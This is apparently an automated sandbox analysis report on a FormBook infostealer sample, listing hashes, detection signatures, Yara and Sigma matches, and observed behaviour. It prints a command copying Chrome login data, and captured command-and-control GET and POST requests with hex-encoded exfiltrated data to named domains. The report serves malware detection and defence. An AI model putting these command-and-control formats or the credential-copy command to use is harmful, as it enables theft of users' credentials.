# Analysis Report xg28sL5JDm.exe

## Overview

### General Information

- Sample Name: xg28sL5JDm.exe
- MD5: 427c74cd09c5e3da8c9c9f3d5c1c126a
- SHA1: 59583b1abf57a9d1d01de013d864ec3c75d68938
- SHA256: e082a8136dd0aa48cfefb68b6afb0878004c250f50900efddba892fc23c68500

### Detection

- Detection: FormBook
- Score: 100 (range: 0 - 100)
- Whitelisted: false
- Confidence: 100%

### Signatures

- Antivirus / Scanner detection for submitted sample
- Antivirus detection for dropped file
- Benign windows process drops PE files
- Detected FormBook malware
- Detected unpacking (changes PE section rights)
- Malicious sample detected (through community Yara rule)
- Multi AV Scanner detection for domain / URL
- Multi AV Scanner detection for dropped file
- Multi AV Scanner detection for submitted file
- Sigma detected: Steal Google chrome login data
- System process connects to network (likely due to code injection or exploit)
- Yara detected FormBook
- Contains functionality to detect sleep reduction / modifications
- Maps a DLL or memory area into another process
- Modifies the context of a thread in another process (thread injection)
- Queues an APC in another process (thread injection)
- Sample uses process hollowing technique
- Sigma detected: Suspicious Svchost Process
- Tries to detect virtualization through RDTSC time measurements
- Tries to harvest and steal browser information (history, passwords, etc)
- Tries to resolve many domain names, but no domain seems valid
- Tries to steal Mail credentials (via file access)
- Antivirus or Machine Learning detection for unpacked file
- Checks if the current process is being debugged
- Contains functionality for execution timing, often used to detect debuggers
- Contains functionality to query locale information (e.g. system language)
- Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
- Contains functionality to call native functions
- Contains functionality to check if a window is minimized (may be used to check if an application is visible)
- Contains functionality to detect sandboxes (mouse cursor move detection)
- Contains functionality to dynamically determine API calls
- Contains functionality to read the PEB
- Contains functionality to retrieve information about pressed keystrokes
- Creates a DirectInput object (often for capturing keystrokes)
- Creates a process in suspended mode (likely to inject code)
- Detected potential crypto function
- Domain name seen in connection with other malware
- Drops PE files
- Enables debug privileges
- Extensive use of GetProcAddress (often used to hide API calls)
- Found inlined nop instructions (likely shell or obfuscated code)
- Found large amount of non-executed APIs
- Found potential string decryption / allocating functions
- HTTP GET or POST without a user agent
- IP address seen in connection with other malware
- Internet Provider seen in connection with other malware
- May sleep (evasive loops) to hinder dynamic analysis
- PE file contains strange resources
- Queries the volume information (name, serial number etc) of a device
- Sample execution stops while process was sleeping (likely an evasion)
- Sample file is different than original file name gathered from version info
- Searches the installation path of Mozilla Firefox
- Uses a known web browser user agent for HTTP communication
- Uses code obfuscation techniques (call, push, ret)
- Yara signature match

## Malware Configuration

No configs have been found

## Yara Overview

### Memory Dumps

| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| 00000003.00000002.922461838.00000000001D0000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security | |
| 00000003.00000002.922461838.00000000001D0000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group | `0x15749:$sqlite3step: 68 34 1C 7B E1`; `0x1585c:$sqlite3step: 68 34 1C 7B E1`; `0x15778:$sqlite3text: 68 38 2A 90 C5`; `0x1589d:$sqlite3text: 68 38 2A 90 C5`; `0x1578b:$sqlite3blob: 68 53 D8 7F 8C`; `0x158b3:$sqlite3blob: 68 53 D8 7F 8C` |
| 00000003.00000002.922461838.00000000001D0000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com | `0x7248:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC`; `0x74b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC`; `0x12ae5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94`; `0x125d1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91`; `0x12be7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F`; `0x12d5f:$sequence_4: 5D C3 8D 50 7C 80 FA 07`; `0x802a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06`; `0x1184c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8`; `0x89c3:$sequence_7: 66 89 0C 02 5B 8B E5 5D`; `0x17e37:$sequence_8: 3C 54 74 04 3C 74 75 F4`; `0x18e3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00` |
| 0000000E.00000002.1485946489.0000000002270000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security | |
| 0000000E.00000002.1485946489.0000000002270000.00000004.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group | `0x15749:$sqlite3step: 68 34 1C 7B E1`; `0x1585c:$sqlite3step: 68 34 1C 7B E1`; `0x15778:$sqlite3text: 68 38 2A 90 C5`; `0x1589d:$sqlite3text: 68 38 2A 90 C5`; `0x1578b:$sqlite3blob: 68 53 D8 7F 8C`; `0x158b3:$sqlite3blob: 68 53 D8 7F 8C` |

### Unpacked PEs

| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| 3.2.xg28sL5JDm.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security | |
| 3.2.xg28sL5JDm.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group | `0x14949:$sqlite3step: 68 34 1C 7B E1`; `0x14a5c:$sqlite3step: 68 34 1C 7B E1`; `0x14978:$sqlite3text: 68 38 2A 90 C5`; `0x14a9d:$sqlite3text: 68 38 2A 90 C5`; `0x1498b:$sqlite3blob: 68 53 D8 7F 8C`; `0x14ab3:$sqlite3blob: 68 53 D8 7F 8C` |
| 3.2.xg28sL5JDm.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com | `0x6448:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC`; `0x66b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC`; `0x11ce5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94`; `0x117d1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91`; `0x11de7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F`; `0x11f5f:$sequence_4: 5D C3 8D 50 7C 80 FA 07`; `0x722a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06`; `0x10a4c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8`; `0x7bc3:$sequence_7: 66 89 0C 02 5B 8B E5 5D`; `0x17037:$sequence_8: 3C 54 74 04 3C 74 75 F4`; `0x1803a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00` |
| 15.1.sdv88p2lg.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security | |
| 15.1.sdv88p2lg.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group | `0x15749:$sqlite3step: 68 34 1C 7B E1`; `0x1585c:$sqlite3step: 68 34 1C 7B E1`; `0x15778:$sqlite3text: 68 38 2A 90 C5`; `0x1589d:$sqlite3text: 68 38 2A 90 C5`; `0x1578b:$sqlite3blob: 68 53 D8 7F 8C`; `0x158b3:$sqlite3blob: 68 53 D8 7F 8C` |

## Sigma Overview

### System Summary:

Sigma detected: Steal Google chrome login data
- Source: Process started
- Author: Joe Security
- Data: `Command: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, CommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\SysWOW64\svchost.exe, ParentImage: C:\Windows\SysWOW64\svchost.exe, ParentProcessId: 5972, ProcessCommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, ProcessId: 3252`

Sigma detected: Suspicious Svchost Process
- Source: Process started
- Author: Florian Roth
- Data: `Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: , ParentImage: C:\Windows\explorer.exe, ParentProcessId: 2928, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 5972`

Sigma detected: Windows Processes Suspicious Parent Directory
- Source: Process started
- Author: vburov
- Data: `Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: , ParentImage: C:\Windows\explorer.exe, ParentProcessId: 2928, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 5972`

## Signature Overview

### AV Detection:

Antivirus / Scanner detection for submitted sample
- Source: xg28sL5JDm.exe; Avira: detected

Antivirus detection for dropped file
- Source: C:\Users\user\AppData\Local\Temp\Mm2kd\sdv88p2lg.exe; Avira: detection malicious, Label: HEUR/AGEN.1046743

Multi AV Scanner detection for domain / URL
- Source: www.allixanes.com; Virustotal: Detection: 6%
- Source: http://www.allixanes.com/ez3/; Virustotal: Detection: 11%
- Source: http://www.allixanes.com; Virustotal: Detection: 6%
- Source: http://www.tylermercer.net/ez3/; Virustotal: Detection: 7%

Multi AV Scanner detection for dropped file
- Source: C:\Users\user\AppData\Local\Temp\Mm2kd\sdv88p2lg.exe; Virustotal: Detection: 81%
- Source: C:\Users\user\AppData\Local\Temp\Mm2kd\sdv88p2lg.exe; Metadefender: Detection: 28%
- Source: C:\Users\user\AppData\Local\Temp\Mm2kd\sdv88p2lg.exe; ReversingLabs: Detection: 90%

Multi AV Scanner detection for submitted file
- Source: xg28sL5JDm.exe; Virustotal: Detection: 81%
- Source: xg28sL5JDm.exe; Metadefender: Detection: 28%
- Source: xg28sL5JDm.exe; ReversingLabs: Detection: 90%

Yara detected FormBook
- Source: Yara match, File source: 00000003.00000002.922461838.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match, File source: 0000000E.00000002.1485946489.0000000002270000.00000004.00000001.sdmp, type: MEMORY
- Source: Yara match, File source: 00000005.00000002.2479604719.0000000000400000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match, File source: 00000005.00000002.2481636727.0000000000A30000.00000004.00000001.sdmp, type: MEMORY
- Source: Yara match, File source: 00000003.00000002.922551051.0000000000400000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match, File source: 0000000F.00000002.1506249884.0000000000A30000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match, File source: 00000005.00000002.2481462321.0000000000A00000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match, File source: 00000012.00000002.1506020051.00000000007A0000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match, File source: 0000000E.00000002.1487281055.0000000002600000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match, File source: 00000000.00000002.865204916.0000000002200000.00000004.00000001.sdmp, type: MEMORY
- Source: Yara match, File source: 0000000F.00000001.1483312311.0000000000400000.00000040.00020000.sdmp, type: MEMORY
- Source: Yara match, File source: 0000000F.00000002.1503710394.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match, File source: 0000000F.00000002.1503886889.0000000000400000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match, File source: 00000003.00000002.923330823.00000000005B0000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match, File source: 00000003.00000001.862672381.0000000000400000.00000040.00020000.sdmp, type: MEMORY
- Source: Yara match, File source: 00000000.00000002.865480989.00000000023E0000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match, File source: 3.2.xg28sL5JDm.exe.400000.0.unpack, type: UNPACKEDPE
- Source: Yara match, File source: 15.1.sdv88p2lg.exe.400000.0.raw.unpack, type: UNPACKEDPE
- Source: Yara match, File source: 15.1.sdv88p2lg.exe.400000.0.unpack, type: UNPACKEDPE
- Source: Yara match, File source: 15.2.sdv88p2lg.exe.400000.0.raw.unpack, type: UNPACKEDPE
- Source: Yara match, File source: 3.1.xg28sL5JDm.exe.400000.0.raw.unpack, type: UNPACKEDPE
- Source: Yara match, File source: 0.2.xg28sL5JDm.exe.2200000.2.raw.unpack, type: UNPACKEDPE
- Source: Yara match, File source: 14.2.sdv88p2lg.exe.2600000.3.raw.unpack, type: UNPACKEDPE
- Source: Yara match, File source: 3.1.xg28sL5JDm.exe.400000.0.unpack, type: UNPACKEDPE
- Source: Yara match, File source: 0.2.xg28sL5JDm.exe.2200000.2.unpack, type: UNPACKEDPE
- Source: Yara match, File source: 15.2.sdv88p2lg.exe.400000.0.unpack, type: UNPACKEDPE
- Source: Yara match, File source: 14.2.sdv88p2lg.exe.2270000.2.unpack, type: UNPACKEDPE
- Source: Yara match, File source: 14.2.sdv88p2lg.exe.2270000.2.raw.unpack, type: UNPACKEDPE
- Source: Yara match, File source: 0.2.xg28sL5JDm.exe.23e0000.3.raw.unpack, type: UNPACKEDPE
- Source: Yara match, File source: 0.2.xg28sL5JDm.exe.23e0000.3.unpack, type: UNPACKEDPE
- Source: Yara match, File source: 3.2.xg28sL5JDm.exe.400000.0.raw.unpack, type: UNPACKEDPE
- Source: Yara match, File source: 14.2.sdv88p2lg.exe.2600000.3.unpack, type: UNPACKEDPE

Antivirus or Machine Learning detection for unpacked file
- Source: 15.1.sdv88p2lg.exe.400000.0.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
- Source: 3.2.xg28sL5JDm.exe.400000.0.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
- Source: 3.1.xg28sL5JDm.exe.400000.0.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
- Source: 0.2.xg28sL5JDm.exe.2200000.2.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
- Source: 15.2.sdv88p2lg.exe.400000.0.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
- Source: 14.2.sdv88p2lg.exe.2270000.2.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
- Source: 5.2.svchost.exe.2d00000.2.unpack; Avira: Label: TR/Patched.Ren.Gen
- Source: 0.2.xg28sL5JDm.exe.23e0000.3.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
- Source: 14.2.sdv88p2lg.exe.2600000.3.unpack; Avira: Label: TR/Crypt.ZPACK.Gen

Contains functionality to enumerate / list files inside a directory
- Source: C:\Users\user\Desktop\xg28sL5JDm.exe; Code function: 0_2_004051BC GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 0_2_004051BC

Found inlined nop instructions (likely shell or obfuscated code)
- Source: C:\Users\user\Desktop\xg28sL5JDm.exe; Code function: 4x nop then mov ebx, 000014B9h 0_2_00469CD0
- Source: C:\Users\user\Desktop\xg28sL5JDm.exe; Code function: 4x nop then push 00000000h 0_2_00469CD0
- Source: C:\Users\user\Desktop\xg28sL5JDm.exe; Code function: 4x nop then mov eax, dword ptr [00475BF0h] 0_2_00469CD0
- Source: C:\Users\user\Desktop\xg28sL5JDm.exe; Code function: 4x nop then mov dl, byte ptr [eax+0046BF64h] 0_2_00469CD0
- Source: C:\Users\user\Desktop\xg28sL5JDm.exe; Code function: 4x nop then inc ebx 0_2_00469CD0
- Source: C:\Users\user\Desktop\xg28sL5JDm.exe; Code function: 4x nop then mov eax, dword ptr [esp] 0_2_00469C6C
- Source: C:\Users\user\Desktop\xg28sL5JDm.exe; Code function: 4x nop then pop edi 3_2_0040BB4B
- Source: C:\Windows\SysWOW64\svchost.exe; Code function: 4x nop then pop edi 5_2_0040BB4B
- Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe; Code function: 4x nop then mov eax, dword ptr [esi+34h] 14_2_022B4705
- Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe; Code function: 4x nop then jmp 022B5F22h 14_2_022B5766
- Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe; Code function: 4x nop then add edx, 02h 14_2_022B7243
- Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe; Code function: 4x nop then mov dword ptr [ebp+10h], ebx 14_2_022B3ED1
- Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe; Code function: 4x nop then call dword ptr [edi+000000F4h] 14_2_022B282D
- Source: C:\Windows\SysWOW64\wscript.exe; Code function: 4x nop then pop edi 18_2_007ABB4B

### Networking:

Tries to resolve many domain names, but no domain seems valid
- Source: unknown; DNS traffic detected: query: www.tinbaofb.com replaycode: Name error (3)
- Source: unknown; DNS traffic detected: query: www.tatilultra.com replaycode: Name error (3)
- Source: unknown; DNS traffic detected: query: www.tqg6k4jl-0k8rlg.com replaycode: Name error (3)
- Source: unknown; DNS traffic detected: query: www.greenslandscapingllc.com replaycode: Name error (3)
- Source: unknown; DNS traffic detected: query: www.estereojerusalenfm.com replaycode: Name error (3)
- Source: unknown; DNS traffic detected: query: www.zqhanu.men replaycode: Name error (3)
- Source: unknown; DNS traffic detected: query: www.chestermerecalgaryhomes.info replaycode: Name error (3)
- Source: unknown; DNS traffic detected: query: www.oraning.net replaycode: Name error (3)
- Source: unknown; DNS traffic detected: query: www.hoops2life.net replaycode: Name error (3)
- Source: unknown; DNS traffic detected: query: www.vxstfh.men replaycode: Name error (3)
- Source: unknown; DNS traffic detected: query: www.jwc.bet replaycode: Name error (3)
- Source: unknown; DNS traffic detected: query: www.djhong.net replaycode: Name error (3)

Domain name seen in connection with other malware
- Source: Joe Sandbox View; Domain Name: www.allixanes.com

HTTP GET or POST without a user agent
- Source: global traffic; HTTP traffic detected:

```
GET /ez3/?dL3=vCpm5ZZqrH7OiMY9wlvLz2zGlUJ+JVzXgj6JNNlAQvXoCTUNGwSPtSxHLDwbMk+jBbWB&f2JLp=0ZWpXH1 HTTP/1.1
Host: www.pawlowski.life
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:

GET /ez3/?dL3=oh/nSlzENG0qUOAwPXeIQOtwW6r8d6QREB9M6hBu+NM+9UHPsG9g+Ot2gFGRe3aStlqv&f2JLp=0ZWpXH1 HTTP/1.1
Host: www.lcpierpontphotography.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:

GET /ez3/?dL3=7CEQ+k742KWuCXQBHgFuLA7JV8UfVcRSEMIHryxdtZ0WgVQp3Q3kFEzSW7ScRDzGFE92&f2JLp=0ZWpXH1 HTTP/1.1
Host: www.tylermercer.net
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:

GET /ez3/?dL3=X3u3PzGnlM4B8cIThswW3+TZhgNWE0aZtyVvUn4Lv16SAoXv0FRCFRv3M3XIz91P9rzv&f2JLp=0ZWpXH1 HTTP/1.1
Host: www.allixanes.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:

GET /ez3/?dL3=vCpm5ZZqrH7OiMY9wlvLz2zGlUJ+JVzXgj6JNNlAQvXoCTUNGwSPtSxHLDwbMk+jBbWB&f2JLp=0ZWpXH1 HTTP/1.1
Host: www.pawlowski.life
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
```

IP address seen in connection with other malware
- Source: Joe Sandbox View; IP Address: 198.185.159.144
- Source: Joe Sandbox View; IP Address: 198.185.159.144

Internet Provider seen in connection with other malware
- Source: Joe Sandbox View; ASN Name: unknown
- Source: Joe Sandbox View; ASN Name: unknown
- Source: Joe Sandbox View; ASN Name: unknown
Uses a known web browser user agent for HTTP communication
 Source: global traffic HTTP traffic detected: POST /ez3/ HTTP/1.1Host: www.lcpierpontphotography.comConnection: closeContent-Length: 153125Cache-Control: no-cacheOrigin: http://www.lcpierpontphotography.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.lcpierpontphotography.com/ez3/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 64 4c 33 3d 67 44 7a 64 4d 41 6d 55 4a 44 4e 43 4b 2d 73 32 4e 51 4f 57 43 49 52 6f 63 37 50 49 65 71 64 50 57 45 51 35 70 42 78 76 75 39 4d 5a 33 32 58 50 6a 6c 6c 35 75 61 51 6f 37 30 4b 56 59 55 61 47 34 55 54 37 36 58 37 66 44 55 58 32 7e 62 6e 63 79 61 61 49 45 4f 75 31 59 66 42 7a 35 61 77 6f 72 56 69 53 72 2d 35 7a 43 41 4c 70 4b 54 48 34 67 47 54 47 79 78 4e 39 47 43 6d 48 5a 68 6f 43 34 34 70 75 38 39 45 51 50 6d 42 7a 70 56 46 4c 72 49 6f 6c 55 5a 6e 4e 4a 44 56 4d 79 4c 56 59 74 46 42 75 47 7a 77 79 76 2d 45 45 58 57 34 51 59 66 38 56 33 7a 66 70 7a 6e 69 46 48 49 6f 71 62 4d 28 32 7e 4a 43 57 69 54 63 56 49 59 78 55 6b 67 73 53 31 71 6e 53 4e 5f 63 4b 43 4c 65 5a 5a 5f 39 6b 49 36 4f 41 59 75 72 39 67 58 6f 6c 46 78 61 5f 6f 6e 55 6c 4d 5a 53 6d 35 48 70 52 68 4d 54 41 28 39 76 59 52 4c 41 56 30 53 46 66 43 30 52 6e 4e 61 48 6c 42 53 7a 4f 7e 4c 4e 75 37 51 6c 7a 32 58 53 46 62 42 74 77 32 6d 65 44 6e 78 65 38 4c 52 67 37 7e 56 34 51 6a 4f 54 7a 59 4c 31 46 65 54 38 47 39 73 6f 30 45 73 70 76 39 41 6d 68 39 58 4b 43 4e 61 34 42 57 6b 55 74 56 77 4e 59 36 51 71 6f 38 37 72 56 31 6c 68 6d 72 34 38 32 57 37 33 5f 4c 51 70 5a 44 39 34 45 79 6a 72 69 51 31 48 5a 64 75 46 6d 59 44 48 76 42 34 48 59 66 52 43 59 77 62 7e 6c 72 34 7a 46 35 6d 69 74 6a 36 6a 6a 69 32 56 49 28 73 39 34 74 32 6f 45 6a 53 57 71 30 50 33 79 32 63 4d 59 58 33 48 61 51 61 5a 79 34 30 72 46 70 75 72 5a 71 6c 28 4f 4a 35 4e 5f 64 5a 47 6b 41 47 4d 32 30 77 4f 64 48 52 6e 6d 4a 4e 74 57 30 6c 66 74 71 31 6c 4b 65 45 65 74 4f 77 53 76 
34 38 52 79 4c 71 41 7a 52 65 73 64 55 56 73 50 73 75 72 76 50 61 4a 66 45 47 6e 37 53 73 59 39 41 4a 39 6e 35 46 6b 44 59 58 6b 32 7e 50 4f 57 6b 6c 6c 56 6b 57 28 4f 4d 4a 54 4d 48 69 43 34 76 6b 34 35 52 58 6b 65 41 53 54 69 72 5f 28 37 64 73 59 53 7a 5a 59 4c 52 49 44 32 65 48 68 6a 42 35 63 45 46 6e 55 45 66 46 4a 31 34 53 4b 64 36 36 71 42 7e 79 6b 75 37 77 58 33 70 2d 38 6c 31 74 43 4d 73 6e 66 58 6a 46 5a 67 7e 78 35 72 28 64 69 31 44 4a 4f 50 71 65 79 53 6c 33 39 47 6f 31 4f 74 65 64 59 51 6c 63 63 2d 34 5a 41 52 43 52 31 6d 58 4b 7e 48 34 70 64 65 69 43 6a 41 45 63 61 37 45 72 75 57 28 64 78 4e 72 37 34 47 52 69 70 37 55 4d 4b 5f 44 62 4f 33 6d 77 6a 36 68 67 65 6b 67 6d 44 77 35 77 65 74 6b 52 7a 66 36 4f 6c 73 52 79 79 70 74 4e 74 72 6e 5f 62 49 30 44 50 52 69 6d 4f 58 67 42 78 49 64 78 5a 6b 76 63 61 54 31 6c 79 70 68 4c 61 4f 75 4e 71 5f 56 49 77 46 28 4c 44 70 54 42 51 44 6a 33 6e 53 32 5a 41 49 43 31 43 62 6d 49 65 4e 4a 6f 72 6f 59 7a 57 55 6a 45 67 63 77 4e 51 53 72 70 4c 69 6b 6a 36 4e 6b 5 Source: global traffic HTTP traffic detected: POST /ez3/ HTTP/1.1Host: www.tylermercer.netConnection: closeContent-Length: 153125Cache-Control: no-cacheOrigin: http://www.tylermercer.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.tylermercer.net/ez3/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 64 4c 33 3d 7a 67 49 71 67 45 4f 44 70 63 53 76 64 57 64 32 61 6e 6b 58 59 48 66 47 62 2d 6b 7a 53 59 46 34 42 6f 64 6b 36 69 56 47 68 4d 45 48 72 6e 4d 6f 34 77 36 4e 58 68 43 52 43 70 7a 41 64 44 37 30 59 6c 4a 36 30 32 30 32 51 55 38 5a 38 35 69 51 32 68 36 77 5a 6f 52 71 30 34 70 31 57 50 44 58 79 53 51 49 41 4b 53 7a 65 43 35 57 7a 6b 66 78 72 72 4c 48 64 31 65 35 44 68 6b 5f 35 58 55 47 28 4d 57 65 63 50 53 47 4b 43 64 49 57 6b 6a 66 6c 4b 54 48 4b 30 37 4e 34 42 49 6b 55 54 66 75 6a 43 6c 72 42 50 4e 67 66 73 77 6c 4c 57 4c 2d 62 
30 6d 6a 55 47 66 64 50 59 41 41 51 45 35 48 67 32 46 63 78 77 28 54 61 6b 44 75 6f 65 6b 48 64 31 35 63 55 4e 47 79 53 4e 62 5f 46 5a 55 66 6b 6c 73 31 61 2d 51 6a 58 41 63 31 48 78 56 33 55 6c 49 48 70 38 49 74 6c 47 76 44 77 33 75 5a 44 4b 69 56 56 58 46 71 4e 6d 6c 38 6b 67 6e 77 77 4d 69 76 4f 53 34 4a 6a 56 4c 63 45 57 72 39 72 62 4e 41 47 5a 79 77 76 5a 49 63 76 65 42 31 59 58 50 74 43 51 43 71 43 73 65 52 37 58 6a 61 34 58 70 44 56 68 39 51 37 56 76 42 6c 38 79 73 31 70 47 55 32 70 38 34 7e 57 72 41 70 64 51 6b 6b 64 41 69 76 65 4e 5a 30 30 41 6c 4b 7a 77 37 5a 6a 45 53 52 79 31 5a 37 31 63 69 79 51 4c 4e 58 78 45 75 56 5a 6e 58 61 45 74 38 51 39 35 33 73 45 74 37 4f 48 32 4d 53 4a 44 34 4b 68 56 33 6d 66 37 35 68 78 48 56 48 6a 61 38 62 49 6e 56 39 4f 54 72 6d 72 71 75 47 6f 41 33 4a 46 38 2d 50 6b 76 67 75 6e 33 77 55 79 6b 67 78 36 63 69 63 6f 67 31 52 44 4d 30 49 4c 55 7a 36 64 4e 7a 58 4c 38 4f 6a 70 74 4c 72 48 4a 32 49 58 6c 46 46 63 74 35 6e 6d 4f 64 31 67 65 46 69 4e 41 36 63 61 62 76 63 66 69 2d 42 2d 66 41 4a 68 4d 68 6c 32 6b 58 35 53 41 78 6a 5f 77 38 41 63 55 36 62 46 73 74 74 47 30 42 37 50 79 7a 71 33 70 47 36 4d 44 35 74 46 72 45 67 65 72 51 47 58 31 49 33 32 6b 41 51 49 67 6f 36 76 66 6e 42 4a 4e 46 59 78 58 44 74 34 6f 48 34 78 38 38 75 5f 48 71 43 6f 4e 79 28 76 30 6a 57 7a 74 45 47 7a 6a 35 74 6d 47 65 76 59 63 5a 4c 69 39 37 59 76 6d 38 4c 6a 35 74 73 5f 54 47 44 56 76 52 68 54 57 58 7a 63 77 68 30 57 52 6a 4e 31 4a 4f 38 5a 6a 52 28 70 53 63 6b 5f 49 5a 78 35 73 41 34 76 33 4a 36 51 56 44 35 65 65 54 63 64 64 42 59 55 6f 37 73 39 70 68 78 46 4e 55 47 33 46 34 63 48 68 54 6e 6b 48 6c 49 5f 66 69 6b 72 70 4f 36 47 52 7a 74 61 7a 35 28 7a 73 63 41 7a 61 65 31 47 4c 4b 63 43 73 6d 41 66 57 33 48 5f 51 48 74 37 64 4c 50 47 32 58 4b 52 74 55 4a 5a 39 47 6c 58 35 57 6c 54 5a 32 4c 41 46 42 47 56 47 48 69 38 45 6d 49 75 46 2d 66 70 61 4f 51 2d 4f 36 4c 55 61 6a 52 51 54 48 7e 48 57 68 4a 37 6e 43 4e 56 37 4a 61 63 51 39 42 6c 7a 53 6e 6e 4c 
6f 49 31 78 5f 45 4a 6f 68 43 44 61 32 4b 53 78 5 Source: global traffic HTTP traffic detected: POST /ez3/ HTTP/1.1Host: www.allixanes.comConnection: closeContent-Length: 153125Cache-Control: no-cacheOrigin: http://www.allixanes.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.allixanes.com/ez3/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 64 4c 33 3d 66 56 69 4e 52 56 4f 73 32 59 42 32 6e 50 67 2d 72 4c 49 4d 70 4f 62 74 70 6a 6c 61 47 33 57 4e 30 45 42 70 50 52 4d 63 72 77 75 75 4b 70 48 33 7a 31 6b 30 43 45 36 76 66 55 75 4b 34 38 46 78 72 6f 53 72 49 44 70 53 77 6f 58 71 36 5f 6b 5a 69 69 73 44 4e 64 61 41 62 36 66 64 28 4d 4a 50 4a 55 70 57 64 2d 4e 54 54 41 4e 2d 30 64 38 69 6f 55 41 75 32 4e 77 58 57 34 47 67 7a 44 56 41 4a 49 57 49 6a 64 77 39 77 62 49 79 34 66 48 76 77 2d 28 41 41 77 79 75 73 33 54 69 37 35 65 46 58 5f 71 59 52 47 47 4f 